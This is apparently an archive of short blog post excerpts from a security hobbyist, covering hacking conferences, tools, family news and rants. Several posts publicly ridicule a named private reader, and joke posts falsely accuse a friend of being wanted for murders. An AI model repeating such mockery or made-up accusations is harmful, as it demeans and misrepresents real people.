Now that everyone and their mother has posted about Back|Track Final being released I feel that I am safe in disclosing that information. But on to the topic, with said release, the folks over at Paterva have released a “Community” edition of Maltego. Straight from the horses mouth, here are the limitations:
Limitations The Community Edition is limited in the following ways:
A 15second nag screen
Save and Export has been disabled

So I had another one of my harebrained ideas and it goes something like this:
Do you use your “DMZ” feature on your router at home? If you do, you shouldn’t. It’s like putting your computer directly on the net. Bad idea all around. Well, instead of having all those packets hit a brick wall, why not put them to good use?
So, create a Virtual Machine that you have running on your system and point your DMZ switch at.

So I was at a ‘talk’ recently where the topic was geared toward technically inclined, but the whole talk was geared toward managers and low level IT bubbas, if you will. But as I sat there stabbing myself in the eye with my pencil (hence the mad cow reference) I can up with some hair brained ideas. Now, some of these ideas might already be out there or thought of, and I haven’t googled any of them, just wanted to write them down somewhere for people to comment on.

This was originally posted at http://www.jpugh.org/2008/01/vonage-and-ekiga-on-suse-linux.html
I had to find it via google cache as the page is no longer there or has just been down for the past week. So I am reposting it for reference:
Vonage and Ekiga on SUSE Linux For the first time ever, I lost my cell phone. No freakin’ idea where it went and this IS the first time I have every lost a phone.

A low doorway in the east wall allows access to the example room, a glowing
portal in the north wall leads to the mortal start area, and to the northeast
is the quiet room, the door of which is currently open.
The LIMA mudlib greeter stands here, smiling politely.
There’s a Camaro Z28 parked here.
Sco’s Pet
There are many clear bottles here.
A map of Lima Bean is pinned to the wall.

So, I have to apologize to the whole Security community for my idiocy. Yesterday I was made aware of a post about Backtrack 3 Final coming out. The link I received was a link to Mut’s blog. While reading the post it mentioned something about an early IRC release. Proceeding to IRC I found a direct link to the ISO in the topic. Excited about the release I failed to read the rest of the topic in IRC mentioning that they wanted it to stay within the IRC community.

Recently I have been hearing a lot of innovators posting to their blogs that they are pursuing new employment with Microsoft, and I wonder if they are making sneaky power plays into the Open Source market. Taking it’s best projects and plucking their leads. For example:
KnoppMyth Creator:
http://mysettopbox.tv/index.html#News
EDIT: The above article seems to be an April Fools joke that I was late to the party on. Thanks to Mark for calling me out.

What happens when the lights go out. Power is gone and all you have left is your thoughts and a laptop that’s battery is quickly dieing? You write. Movies will take up too much power and it’s too dark to read so you write. What do you write about, does it really matter? You write.
I am a part of a great many projects but I can’t say that I have contributed to them very much.

The videos from ShmooCon 2008 have hit the shelves. Go download them at:
http://www.shmoocon.org/2008/videos/
Digg It
EDIT: As of the time of this post, some of the videos are incorrectly named. Here is the 1-> 1:
Correctly Named:
21st Century Shellcode for Solaris
Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to SPIKE land
Backtrack Demo - “Hacking and Stuff”
Bake Not (Fried, spelling error on filename) Fired - Performing Unauthorized Phishing

Oregon’s State Legislature passed a law that provides a full-tuition waiver for a bachelor’s or master’s degree at an Oregon University System institution for children or spouses of service members who died on active duty, became 100 percent disabled in connection with military service, or died as a result of a disability sustained on active duty
My home state rocks.
Military.com’s Writeup | digg this story

Wow. I have to admit, they did the Facebook chat right. I like how it looks and how it works. I would only change one this and allow chats to disembark from the status bar, but other than that, congrats. It is actually keeping me on Facebook longer.
Enough brown nosing, here are the pros and cons:
PRO: very well done layout - clean, crisp and not in the way

Programmers vs. Management
Posted on April 17th, 2008 by Carolyn Shelby
Received from my mom today, via email.
A man in a hot air balloon realized he was lost. He reduced altitude and spotted a woman below. He descended a bit more and shouted, Excuse me, can you help me? I promised a friend I would meet him an hour ago, but I don’t know where I am.

So, this is the second time I am writing this article, which really takes writers block to a whole new level. It sucks to loose all of your writing a one fatal click. But enough of my belly aching.
http://www.phrack.org
Phrack Issue #65 is out, as of April 11th, 2008. I am by no means a Phrack addict or aficionado on all things Phrack, and I have only read TCLH’s introduction which in my humble opinion it is close to Mentor worthy.

Red Skelton was a good & funny man. He also ended every show by saying, ‘GOOD NIGHT AND GOD BLESS.’ Listen to the end of this. It is something he said 39 years ago.
Youtube Link: Red Skelton’s Pledge of Allegiance
You can also help others find it by digging the story

So, a while back I wrote about a program called “Evolution”. Since then it has evolved into its new form “Maltego”. Maltego has had it’s face ripped off and remolded, and lot of work on the back end, if you know what I mean.
So basically I was teased by the creator of Maltego. He sent me these two images showing the awesomeness that will be Maltego v2 (and yes, Awesomeness is a word)

I just wanted to do my part and tip my hat to Johnny Long from Ihackstuff.com. He really is doing great work. Also, check out hackersforcharity.org to do your part. Without further ado, HERE’S JOHNNY!
No Tech Hacking Released!
I’m proud to announce the release of No Tech Hacking from Syngress Publishing! I’m even more happy to announce that 100% of the proceeds will be going to charity. In fact, each purchase through this Amazon like will feed an African child for one month!

I’ve had an idea and I have been hashing it out the last couple days. I want a smal piece of hardware that runs basically a MITM, but a physical one. Something like those old keyloggers that you plug between a PS/2 keyboard and a computer. If it already exsists, please link me, but this is what I want it to do:
Features of the KVM-MITM:
Ports: (2) DVI or VGA; (2) Ethernet NICs; (4) USB or/and (4) PS/2 Ports <– Half male, Half female

This is me complaining that I have too much on my plate. And, it is all my fault that I accepted so much. Here are the projects I currently am working on:
Hak.5 Radio - This project has taken on a life of it’s own, the community member run it and are currently working on a site design and back end. I really have to applaud the effort and free time that everyone on the H5rDev team has put into making the only community radio station on the net so sucessful.

Original Source: truckbearingkibble.com/comic/2007/11/08/the-gods-must-be-tasty/
I saw this on stumble a couple weeks ago, and it’s been stored as a draft for that long. Anyways, I think it is one of the most hilarious comics I have seen in a very long time (Exception {Dilbert}).

Remote Exploit has released BackTrack 3 Beta. An official announcement is due tomorrow, and until then, the ISO and USB images are available on torrent, and the Hak.5 Community, to include myself has really stepped up and footed some HTTP bandwidth for those less fortunate not to behind P2P block and/or retrictions. I will be writing a piece up on the Beta as soon as I get the same thing that the developers have been craving:

So, last Shmoocon (2007) was my second year running at the con and we did something that hasn't been done before: A Security/Hacker's Pod/Vidcast meetup at the conference which gave a chance for their listeners/viewers to meet the people behind the mic/camera. Well, a little less than one year later and plans for the next meetup are already underway. And, as I learn the ropes of putting something like this together we will be getting better venues and hopefully down the road meetups will pop up at Defcon and other conferences.

A while ago I said that I was going to start putting more security related articles up. Well, it’s now on the wire. I have applied to join the Security Blogger’s Network. So a lot more people than just the Hak.5 crew are going to possibly be reading this blog. I may or may not be chosen to join the network, but if I do, it should be an wild ride.

It is not often, especially this day in age, that shakes one to the core. This is one of those times. Original Source: http://www.eightcitiesmap.com/transcript_bc.htm
DR BILL COSBY SPEAKS at the 50th Anniversary commemoration of the Brown vs Topeka Board of Education Supreme Court Decision Ladies and gentlemen, I really have to ask you to seriously consider what you’ve heard, and now this is the end of the evening so to speak.

George Carlin is funny. Offensive to most everyone, but I think the whole “I hate everyone, so it’s not an ‘ism’ thing” works here. Here he is on the topic of Religion: [youtube http://www.youtube.com/watch?v=MeSSwKffj9o]

I was a quick fan of the show called “Jericho” on CBS. It was one of the few shows on that didn’t have the advertising that LOST or The 4400 had, but still competed or surpassed in some cases the level of story and all out “Good”. I am lost for words since I’ve posted like 4 posts tonight, so without further ado:

Pay premium dollars for bottled water? Think it tastes better? Do you actually believe that it comes from the places that are printed on the label? Well here are Pen and Teller’s answer to those every questions:
[youtube=http://www.youtube.com/watch?v=XfPAjUvvnIc&w;=425&h;=350]

So, this is my first time writing with ScribeFire. (We’ll see if it auto detects it’s name and links to it. But, as you can probably tell by the title, this article isn’t about ScribeFire. It’s about Logmein.com. Now, you most likely have already seen or used this service, and I have fought back in forth in my head about regurgitating information which I think people already know. However, I’ll save that talk for another post.

QUESTIONS ********* Why do you need a driver’s license to buy liquor in America when you can’t drink and drive? Why isn’t phonetic spelled the way it sounds? Why are there interstate highways in Hawaii? Why are there flotation devices under plane seats instead of parachutes? Why are cigarettes sold in gas stations when smoking is prohibited there? Do you need a silencer if you are going to shoot a mime?

I paid 700 dollars for a piece of paper on eBay one time and didn’t not have the common sense at the time to take it any further than contacting PayPal (which didn’t help). But this mother did.
[youtube http://www.youtube.com/watch?v=A12qtprly-Q]

Microsoft employs some of the best hackers in the world and actively recruits them and develops them. They work on all kinds of projects, whether it be in development, research, testing, management and of course security.
read more | digg story

The legendary BitTorrent site â€œSuprNovaâ€� will return today, courtesy of The Pirate Bay. Not surprisingly, the new and improved SuprNova has a special message to the copyright police: â€œYou are the past and the forgotten, we are the Internet and the futureâ€�.read more | digg story

Ok, admit it. You have searched for your name in Google, Technorati, or egoSurf.org just to see how you were ranked. You may have even gone to the extent of using RSS feed searches or services such as MonitorThis to keep tabs on your name/handle.
Or, you might be a Penetration Tester who is in the “Enumeration / Information Gathering” phase. Or a Security Professional that wants to keep tabs on what kind of fingerprint their company has out there.

You never know where and when you may need to pick a lock. You may just need to get into your house or car, or you may be captured by insurgents in a foreign nation. Whatever the case may be, this is the Beginners Guide To Lock Picking. With practice and time, your skills will improve.read more | digg story

Originally posted at: http://tech.nocr.at/hacking-security/nmap-127-0-0-1-flash-style
A design flaw found in ActionScript (Flash) has been allowed the scanning hosts via trial and error. Whenever a port is queried by Flash that isn’t open, it responds with a “SecurityErrotEvent” instantly. But, when a port is open, it doesn’t get that response for an extended period of time, while it waits for a reply to “policy-file-request”. PoC can be viewed at the below address. Now the question is: What ELSE can you do with this information once you have this ability.

Originally Posted on TECH.NOCR.AT @ http://tech.nocr.at/content/view/22/1/
Secunia.com has been a great resource of vulnerability and virus information over the years for Black, Grey, and White hat hackers alike. Recently they released a BETA project that looks promising and could be the first step into a “package manager” for Windows. In there own words:
A new addition to the Secunia Software Inspector series, the free Secunia Personal Software Inspector (PSI), is now available for BETA testing.

A couple people have asked for links on where I got this portable app or that, well, all over really. Here are a few links to get you started:
http://www.dirk-loss.de/win-tools.htm
http://www.tinyapps.org/
http://www.portablefreeware.com/
http://en.wikipedia.org/wiki/List_of_portable_applications
http://standalone.atspace.org/
http://portableapps.com/apps
http://www.kikizas.net/en/usbapps.html
Also, I gave some of the apps their portability myself. It’s a easy process. Drag and drop an installer file “setup.exe” or “whatever.msi” into Universal Extractor. What you are going to get is a folder right where that installer is, with the same name as the installer.

I don’t use Wine. It’s difficult to get anything working and a pain once it is. However since I found out about the Wine-Doors project, it’s made me go back on that thought.
It’s a fairly new project, but well on it’s way to being an enabler for a great many users. A great many users have been looking for that one last thing, to get them over the hump of still using Windows.

Yup, it’s finally here. Download it here! RIGHT CLICK AND SAVE AS
So now that is done, I get to talk about other things that I am getting into:
Wubi “Linux” Installer: http://wubi-installer.org/
This is actually pretty amazing. What it does is automagically downloads an ISO (takes a while), makes a virtual disk, puts entries in the Windows boot loader and tells you to restart. When you restart it boots to the virutal disk and installs the version of Ubuntu you chose.

Of course I am a little late, but litterally the ULTIMATE guide to wrt54g hacking is shipping:
http://www.amazon.com/Linksys-WRT54G-Ultimate-Hacking-Asadoorian/dp/1597491667
Also, you can check out Paul Asadoorian and Larry Pesce at http://www.pauldotcom.com
You can also download the PDF version of the book at: http://www.syngress.com/catalog/?pid=4170
CONGRATS GUYS… now where is my free copy?
mubix

I received a Fonera router from my friend boxgamex and what was the first thing I thought of doing to it? Slaping OpenWRT on it and going to town. Well it took me 2 days of intense R&D but here is what I can tell you to make your life a little easier than mine was:
I am definitely not going to reinvent the wheel, there are some great tutorials out there and I am going to link to them through out this article.

You know, I putting together a folder that would contain a copy of all my USB apps, minus the config files and I realized; Some of these people might get a bit miffed about me redistributing their software. So, I know you guys have waited forever and a day already, but I have to drag it out just a tad more. I am going to do the work of checking into each license to see if I can redistribute it.

So I am a complete noob when it comes to multicast and recently I have been hearing about it more and more. I know it’s been out there since the dawn of time but I simply thought it was a way of broadcasting video across the network. WRONG. So for those who don’t know, and correct me if I am wrong, a computer or device sends out a multicast packet headed for a 244.

Michael Noah Fuller 11:24 AM - May 13th, 2007
20 inches tall
7 lbs 15 oz
Baby and Momma are doing great.
those of you waiting on my USB torrent, I’m sorry to say, you have officially been trumped. I will get it up there some time in the next two weeks.

Ok, so I got a lot of questions of how everything works on my encrypted U3 drive. I started off with the
Here is what goes in my go.cmd file from the SwitchBlade
@echo off
truecrypt /q /v saved.pst /lo
o:pstart.exe
So what I am doing here is connecting the saved.pst file as a truecrypt volume using /v. I am using the /q so that it doesn’t open the whole Truecrypt GUI.

As many of you know, I ran Hak.5 Radio for the longest time, and I am now a co-owner of the phoenixed Hak.5 radio station effort: KGMR Radio. So it shouldn’t suprise you to see that I fully support the following and expect you.. YES YOU, to click the link and tell your congress man or woman what is on my mind.

When I checked my Amazon account today, I was amazed to find that about 90% of the books that I have in my “Saved for later” cart have increased in price. What’s going on? I guess this raises a good question. What regulates the rise and fall of prices on the internet? Do you “shop around” for books on the internet? Or do you just go to Amazon.com and buy what you need?

Recently I was listening to Episode 66 of PaulDotCom Security Weekly and they briefly touched on Packetfence. Packet Fence is a Open Source NAC. This is the first time that I have really gotten hand on a NAC. I have heard of NAC and at ShmooCon Labs, I was part of Simple Nomad’s team and Vernier’s IPS/NAC. However, I didn’t get a chance to get hands on during the con. So that puts me in the “noob” category.

So you couldn’t make it. No worry, you have undoubtedly been going through the videos from shmoocon already. If you haven’t yet, you should, they were well done and better than last year. But, what you might not have done yet is the Hack or Halo contests.
Update: We’ve determined the images have become corrupt during one of the transfers and have been taken offline until the problem has been fixed.

The contest that won two “hackers” PS3s at ShmooCon is now open to the public. I found this post on http://hkashfi.blogspot.com/index.html
ShmooCon07 “Hack it” Contest During Shmoocon2007 there was a contest open to interested hackers. If you’re curious about it but hadn`t chance to join the con, well it’s still open for you to check your skills but don’t expect any reward :> If you like to get familiar with challenges in Cons, you can try this one.

So, it’s over. ShmooCon and the meet up is finally over. I had a blast, but it put a tax on my time like you wouldn’t believe. I can’t imagine what life is like for the Shmoo group, especially Heidi. I will be posting all of the pictures on flickr shortly. I got to do a lot of other things at ShmooCon other than just the meet up. I had the distinct opportunity to help bag over 1000 bags with swag, Shmooballs, and adverts.

I know that I said this was going to be a security blog, but I figured I would continue on my rant on Vista after this happened.
Ok, so there I was…
I saw on Betanews.com a article on Vista Hardware Assessment Tool Addresses Upgrade Dilemmas by Scott M. Fulton, III of Betanews, which toted of a Windows XP tool to check for hardware compatibility for Vista.
Curiosity got the best of me, so I downloaded it (25.

First of all, every blog entry on every blog, is in fact a RANT. So, stating that one is, is kind of pointless. That being said. Here is my rant:
Now that I have changed this part of my blogisphere, I have been getting guff about not covering certain exploits and 0-days. So here it is:
Microsoft Excel 0-day
The easiest way to make a unix based system (Mac) insecure:

Alright, before you start sending hate mail or posting comments on how you hate my mother for giving birth to me, bare with me.
So, Microsoft puts out their new operating system that is “A New Day”. Microsoft at the launch states that they are already “full speed ahead on SP1”. Microsoft releases that they will be releasing Vienna’s successor in 2009.
Those are the facts. Or, as I like to call them “Time-insensitive” facts.

I’m going to start this whole security thing by taking a look at the new BitLocker technology built in to Vista. Before I begin, I want to specify that I am by no means an expert on BitLocker and all of my information comes from the Microsoft site and a face to face with the engineers at Launch Tour 2007. So lets begin with requirements. You must have a modern motherboard which has a “TPM” or Trusted Platform Module.

Well, since they mentioned room362.com on Hak.5 live, I guess I have to update this more often. At first I was updating my Vox and this with the same stuff, and then it became just Vox. So I have decided to separate the way I use each. From now on this will be a security blog. More to come. (Yes, actually)

Boss! I can't come in today. I woke up this morning and found 20 inches of snow in front of my drive way. Don't we all wish it was this simple. Anyways, I went home for Christmas, back to Oregon. Had a good time, got some good presents, yup... everything was good. New Years is coming up. 2007... yeah, the whole millennium thing is wearing off. As for the key chain, I got a cool skeleton key chain for Christmas that is almost impossible to fit in my pocket, but oh so worth it.

It has been decided that I, yes, yours truely has been officially inducted into the Killer Coding Ninja Monkey University. There, I will study CS-AH2HC-B. I chose the ‘B’ track over the ‘A’ track because of the professorship at on ‘B’ campus. Being a freshman at KCNM U is quite an honor, and I look forward to good times, and possible joining a frat. Dare I say, even the Lamda Lamda Lamda frat may find me worthy.

So, Hak.5 Radio is really taking off! We are now certified free and clear, you can check it out below. Just wanted to make a quick quip, more later.
psst - however, as you can plainly see, this is far from LIVE data…
jd

Yah, I know, it’s a bit late in coming but Frank Linhares has finally gotten his butt in gear and posted Ep 30! Check it out at
or you can subscribe to it via iTunes by clicking this link
If you can’t find the link, try clicking on the image.
Awesome job Frank! Welcome back to the podcasting realm.
mubix

Sorry to get your hopes up, but other people have been waiting for this to happen too…. Well, a design team was actually formed and got together to build a “mod” for StarCraft based on the WarCraft 3 engine. Some are calling this StarCraft 2, however Blizzard has refrained from fomally answering any questions about the unofficial mod.
http://www.wc3campaigns.net/revolution/forum/
mubix

I have decided this year, for my birthday, to create a list of so-called “WANTS”. I prefer to see them as “NEEDS”. I have intentionally created this list large, as to give the most choices when selecting a gift. I have also tried to provide links to where these items can be bought online for the least amount of money. I have intentionally left prices out of this, and the list is unordered.

Well, I am home. Not actually, I’m in the U.s. waiting for my flight to NOVA. I have a very interesting flight, more so than usual. First things first: No, the person next to me wasn’t an old lady that wanted to talk my ear off or a crying baby. It was actually a mother of an adorable boy that was sitting near the window. But you don’t want to hear about good stuff.

I broke down and bought a card reader. So check out my flickr. I have over a hundred pictures posted from the few days that I have been over here, and I’ll be posting more and more each day and they will all be in the same flickr set.
Well we went to Akihabara again today to return a wireless card, but they wouldn’t take it back. Ghey. But I got a really cool usb flash drive and a the card reader I needed.

I’m taking a time out of all the hustle and bustle of Tokyo, Japan to write a little and promise picutres in the near future. Well, once my integrated card reader decides to read xD M-class cards. I just applied the patch from HP but it still has major problems. It gets to the first image and stops reading and I get all kinds of write errors. To add salt to the wound, I forgot my USB cable to my camera, so I really have no way of getting my pictures off the camera.

As with any new thing there is always something that goes wrong.
The commentary for the Hak.5 Lanparty has been delayed due to Microsoft Windows being stupid. So everyone say “Thank you Bill!” and hopefully we will be up and live soon.
Sorry for the delay.
GCA - Mubix
ALL PROBLEMS WERE FIXED. THANKS FOR LISTENING

The Game Commentator’s Association (GCA) has be graciously asked to host the Hak.5 Counter-Strike: Source tournament tonight. We accepted and will be starting our commentary at the start of the game. More information can be found on the Hak5 website and below.
Game: Counter-Strike: Source
Date: Saturday, May 27th
Time: 9:00 PM EST (-5 GMT)
Server: game.hak5.org (password: hak5)
GCA Commentator: Mubix
GCA Commentary Stream: GCA Stream
The stream will go up ~30 minutes prior with just music.

This is my wife’s first Mother’s day, so if you could send her a message on Yahoo that says “HAPPY MOTHERS DAY FROM ROBERT” I would greatly appreciate it. I am trying to get her whole screen filled up with random people saying Happy Mothers Day. You see, I try to be as inventive as I can on holidays so that I can suprise her. So please, help me out. Her nick is (Thanks for your support she loved it) .

So, I haven’t posted in a while. Which is due to supreme work related stresses…. no, actually just lazyness, but atleast I am a bit better than say, oh Darren Kitchen, (April 17th) or Wess Tobler (December 11th). Ok, ya, my last post was on the 6th of April and TECHNICALLY I don’t beat Darren’s but, I actually post something, he posts videos… pfffft. That isn’t a blog. ;-) You know I love you D.

Ok, so I am a little late on posting. Been kinda busy with my new son, work, and everything in between (mainly IRC). The reason I am posting about this episode is because I was welcomed onto the show as a Guest. If you have already seen it. Yes, I was nervous and Yes, I am ugly. Get it? Got it? Good. Ok, well I did a segment on applications that conviently fit onto a USB flash drive.

Pandora is a cool place where you can go and listen to music and it suggests music for you to listen to based off an indepth engine of sorting. Everyone on the podcasting planet has covered this awesome. I don’t know what to call it, tool, application, website ,’thing’. After watching Hak5’s episode showing off time spacing Pandora a while back, a idea started festering in my subconsious. Well, driving home today, it finally surfaced.

A while ago, I posted a PHP Relay location to my site, and to a Hak5.org’s forums. Recently I saw quite a bit of traffic going directly to that URL. I have taken action to ensure that this privledge that I am extending to the world, free of charge, is not abused. I have a cron job running that assess that use of that specific file and by what IPs. It then takes any IP with use over a certain limit and adds them to a complete block, to the relay, to my site, and any other site that I host.

A leaked image from an upcoming episode of LOST. Could it be that Henry Gale is telling the truth? Or could this just be some sort of flash back?
The original post can be found here: http://lost-and-gone-forever.blogspot.com/2006/03/my-most-controversial-post-ever.html
The image mirror is here:
http://img73.imageshack.us/img73/3397/3783989920ig.jpg
And you can digg it here:
http://digg.com/links/leaked_LOST_picture

I want to take this opportunity to pay some homage to a great man that I had the pleasure of watching on TV at great lengths, thanks to my dad. Don Knotts, also know as Baney Fife from the Andy Griffith show. Rest In Peace:
I found out from the Washington Post at this article:
http://www.washingtonpost.com/wp-dyn/content/article/2006/02/25/AR2006022501535.html

Today I saw on Bugtraq a new 0 day coming that affects all up to date versions of windows. The most extraordinary part of this, and similar disclosures, is their workarounds. Since Redmond has decided not to patch, until a later date, it is up to the discloser or a likeminded individual to figure out how to protect the masses. Guess what ends up being the fix? “Disable said Microsoft FEATURE”.

Geez. I never have time anymore to put something on this darn thing. I think I am going to stop apologizing for how long it takes me to post, because it is quite quickly becoming the norm. So anyways, since my last post, I have been to ShmooCon ‘06
I met some great people to include but not limited to, Lance James, Kevin Mitnick, Fyodor - A.K.A the creator of NMAP, Skydog, DC-Mike, and Simple Nomad.

Yeah, I know it’s been a while AGAIN since I have posted, but I just wanted to say Happy New Years to everyone. This year is going to be a very different one for me since my wife and I are expecting in Feb. I am really excited about my future son. It is a blessing to be able to bring a life into the world, and a big responsibility. I am also starting college back up.

Huge shout out to my best friend Heath Mouton!! Congratultions man!
Name: Rayne Marie Mouton
Weight: 3 lbs 9 Oz
Height: 17 inches
Born December 13th 2005 at 5:27 PM
The reason for the late posting is because my BEST BUDDY failed to mention it to me. ;-) Still love ya man.
jd.

I have created this post to invite all who read this (all 5 of ya, yes, I know your IPs by heart) to a game that was initiated out of a forum thread on the Hak.5 Forums. If you would like to join the game, by you commenting on this post you are accepting an agreement that ANYTHING that happens across this VPN is not my or any of the participants fault.

Just a real quick FYI. Since I have been getting more and more into the IPTV scene, I figured that I would add links to my favorite shows. I will most indubitably be adding more, but this is a good start. Check it out over
<——————– There..
opps.. now there —————————————————–>

December 2nd, I drove down to Williamsburg VA to meet up with the guys from Hak.5 and Frank Linhares. For those of you who don’t know. Hak.5 is an IPTV (Vidcast) show, which basically boils down to a TV show on the internet. Anyways, I got to meet up with these fellas and a couple other interesting people. While I was there, I had the privilege of helping out not only in the live techPhile podcast by Frank Linhares, but also the ‘glue’ segments of Ep 5 of Hak.

Well if you were wondering about me, I didn’t die. I am working on a super secret project for Frank Linhares of techPhile.ca
But don’t tell anyone! That is secret squrrell news. I have also submitted some logo ideas for the new Auditor Security Collection. You can vote for me: HERE
I also got a HP dv1420us which, so far, I really like. It doesn’t like linux too much, but it is challenging me to learn more about the kernel and other aspects of linux to fix the problems.

I was promoted to the Rank of Sergeant. Just wanted to let people know. And the reason why this entry is so short, is NOT because I am not excited about it. It’s because I have better things to do right now ;-)
Sgt jd.mubix

Duder,
CONGRATULATIONS!
Mia Kei Duder
Born October 13th 2005 @ 1:55 PM CST
6lbs 12 Oz - 20 Inches
Our hearts go out to you and yours. We wish you the best of luck.
jd.
P.S. Sorry it had to be a girl ;-)

Most of us in the industry know what the slashdot effect is. But for those who don’t. Slashdot.org has such a following, that, when a news article is posted on Slashdot, so many users click on the links provided that a unintentional DDoS or Distributed Denial of Service attack is created, where the news site is taken basically killed by all the traffic that it instantly has to deal with. Well Digg.

I did a search on Digg.com and was suprised to see that not a soul has written about ShmooCon 2006. I guess all you west coasters only care about DefCon. That is discrimination and WE DON’T HAVE TO TAKE IT!. Back to reality. Well if you don’t know ShmooCon is basically the DefCon for the east coast and is being held in Washington D.C. . Registration is limited, unlike DefCon, so hurry and whip out those Paypal accounts.

For those of you who do not know Whitedust.net is the leading independent ‘hacker’ portal. Yes that’s right! All of you Skiddies out there, you may not know who you are but WE DO, this site is NOT for you. Now that that disclaimer is over:
Ladies and Gentlemen,
If you have been luck, you’ve already seen them on /. or even on digg.com. Whitedust.net is an awesome site that has great articles relating to security and other such things.

Security oriented Linux Live CD “WHAX” is supposedly merging with Auditor.
Quick history of WHAX:
Whoppix based off Knoppix: Awesome CD
Whoppix gets a name change and base distro change: Not broken, don’t fix it.
New WHAX website gets hacked: ironic.
Sep 9th… We (WHAX) are merging with Auditor, we need a new name: Anyone up for a downhill run?
STILL NO UPDATE! What’s going on guys?

My wife and I did our first ultrasound today and IT’S A BOY!! When you decide that it is a good idea to send cash and gifts (jedi mind trick) … just email me at jd.mubix AT g m a i l DT c o m . In the mean time, start saving, my son is going to college, and yes, you are required by law to pay his way through college and any credit card bills he may incur going to frat parties and gaining his higher education ;-)

Ok, yeah you’ve got me. This is old news. But COME ON! Someone needs to send a Marine Drill Instructor over to the Army and woop these guys into shape! The windows version of America’s Army version 2.4 came out May 16th 2005. That is a 127 days (4 months) at the time of this post. Where are the Linux and Mac versions?!?! We are still stuck in version 2.3. They haven’t even release an update so we can at the very least run linux servers!

Update Some nice digg user decided to comment and inform me that this was the FIRST Bond book. Basically Bond before the toys. hmm, nope, still don’t like the idea.
**Ok. I’m pissed. **
Let me get this straight. You’ve got
A legendary name (“James Bond”)
A multi-million dollar market
A slew of Hollywood stars that have made 007 great
Fan clubs spanning the globe
MILLIONS OF DEDICATED 007 FANS

Are you guys trying to tell me something? I’m the dork at prom who hasn’t noticed the “Kick Me” sign on his back. What exactly is making ya’ll run away with lightning speed? Come on, be the stand up person and tell me. (For the Ashley Park people out there. This means LEAVE A COMMENT)

LADIES AND GENTLEMEN,
I am proud to announce that TechTV, the cable television channel that we know and USED to love might just be making a comeback. In an ‘Aliens’ sort of revival, a year and a half after they were pwnd ‘merged’, might be popping out on top of G4. For starters they are bringing back “Call for Help” with Leo Leporte. First seen on KevinRose.com which is a blog written by, yup you guessed it Kevin Rose, the next move is that the G4 Founder and CEO who engineered the dumbass move ‘merger’ has been FIRED!

I have officially determinded 12 hour shifts suck. Whoever invented this crazy idea needs to be shot. Oh! I’ve got an idea! Instead of 3 people per day, which allowed all three to have proper recoupe time, lets make it just 2 on a 12 on, 12 off schedule! We can use that employee somewhere else! Sound like an issue of Dilbert? Yeah, I thought so too.
jd

We are back online! Yes, much to my reporters anguish they are back on the beat. They whined and complained. I think they just wanted another week off is all. Anyways, the news will start pouring back in once I kick a couple butts to the curb. I would like to take this opportunity to welcome a couple new faces to the R362 Approved community. BADFOO.NET and SBHIDEOUT.COM . They have rightfully taken there place among legends.

NOTICE: All updates are on hold till Tuesday. Sorry.
Not much has changed except for the hosting service.
Changes will be happening though. I will be adding a pod cast. Excited yet?
If you found me already, you are either.
Very, Very bored.
Someone I know.
Hope to see ya around.

I went to see The Transporter 2 tonight. Normally I watch movies using an ‘alternative’ method, but for action movies it is really hard to get into it without the 13 speakers blaring heart pumping music into your face for a eyeball warping experience. I have to admit, that this movie was great, but if it had not been for the fantastic sound effects, music, and overall audible feel to the movie, I would have thought less of it.

Yes that is right, you heard it here first! BADFOO.NET is up! I’m not saying that they (he) has content up yet, except for a pic of a hacked up HP. But I have assigned a couple reporters to this story and I will keep updates as this page evolves.

(Updated because people were having a hard time finding where I had put the site)
I am no longer going to post everything she writes to the main page. It is taking up too much space. From now on I will post when there is an update, and you can find it in the navigation bar. Hopefully I didn’t make it too hard to find.
jd.mubix
For those of you featured in the picture below, look at the left side of the page, find “Stupid People”, click that, then when “Ashley Park” shows up, click on her.

I found a site that breaks down the barriers between technology and rednecks! This revolutionary teaching method comes to us from Advanced Redneck Learning Center. You can also click the thumbnail below to print out this cue card for all of your redneck friends.
Ashley Park update: I posted her comment on the static page.

And here is what she sent me back:
WHAT THE FUCK EVER. I KNOW THAT I LOVE MY COUNTRY AND MY TROOPS. I KNOW THAT BUSH IS SENDING MORE OVER THERE TO BE KILLED. I HATE IT BUT I GUESS THAT IS WERE PEOPLE MESSED UP FOR VOTING FOR HIM. I WASNT TALKING ABOUT THE HIJACKERS THEMSELVES, BUT THEIR “BOSS” DUH. BUT YOU KNOW WHAT I AM SO TIRED OF HEARING YOUR SHIT BECAUSE THAT IS ALL IT IS.

I sent her this today:
Ashley,
I think you watch the news too much. First : The reason why we can’t find the airplane hijackers of 9-11 is because they went up in a cloud of smoke just like all our loved ones did. Second: ‘They’ aren’t smarter than us. We are just a lot bigger target. What is easier to catch? A pillow or the piece of lint falling from it?

Should I respond and keep it going? Give me your comments.. or should I create a poll? If you want me to keep it going, should I:
Tell her to check out the site again, cause you know she hasn’t Tell her off Be nice …. again You decide.
One of my readers was trying to post this in the comments. So here it is.

If this is your first time reading this, then you need to read this first: (Angry Reader?)
I got this today:
Well you now what, I have always had a problem believing people but I grew out of it. And now I realize why I never trusted people before because they cant be trusted. You post a lie on the internet and dont even let anyone know it is a lie.

UPDATE: I just looked at your ‘referal’ page http://search.yahoo.com/search?p=www.usmc.com&fr=ieas-dns
… you did a search for www.usmc.com…
This speaks for itself:
Ashley: (A Comment on USMC: Crack down on Tats)
I can’t believe that they are doing this. Everyone in my boyfriends Platoon has a tat.They are over seas dieing and they are worried about tattooes?!!!?!? Shouldnt they be more worried about their safe …
I sent her this email:

UPDATE This keyboard is NOT compatible with Windows Longhorn but sources speculate that Vista will support this new keyboard possibly starting late 2007
Microsoft has come up with a new keyboard that includes a curious button. This keyboard is said to have already been distributed to all of their employees globally. Room362 reporters followed one of the Redmond employees home in the chance that he/she might leak information on a global release date or possibly a picture of the keyboard.

Well there is reason behind it. I was following up on the Silent_Bob case. Nothing to report yet, but I am following up on some great leads:
The CIA currently has 10 operatives searching for Silent_Bob (information accredited to hacker: duder)
Offenses are still unknown but could be related to the CS Assasin back in 2000 who used a USP silenced that police believe is still at large. (60 murders all over the country are accredited to this unknown killer.

Let me be the first to welcome Gentoo into the 21st Century. Creating an Installer instead of a 40 page ‘Handbook’ was a bold and innovative move. In this bold move they have enticed new blood to this awesome distro such as the renowned Silent_Bob who now goes under the alias thesb to avoid FBI and CIA warrants, but that is another story altogether. (Which I will follow-up on if you, the reader, comment and tell me to) But back to Gentoo.

Ok, yes, again. It has been a while. But I am back. I got a new Wireless PCMCIA card (ORiNOCO a/b/g Combo Card Gold). So far it is a great card.
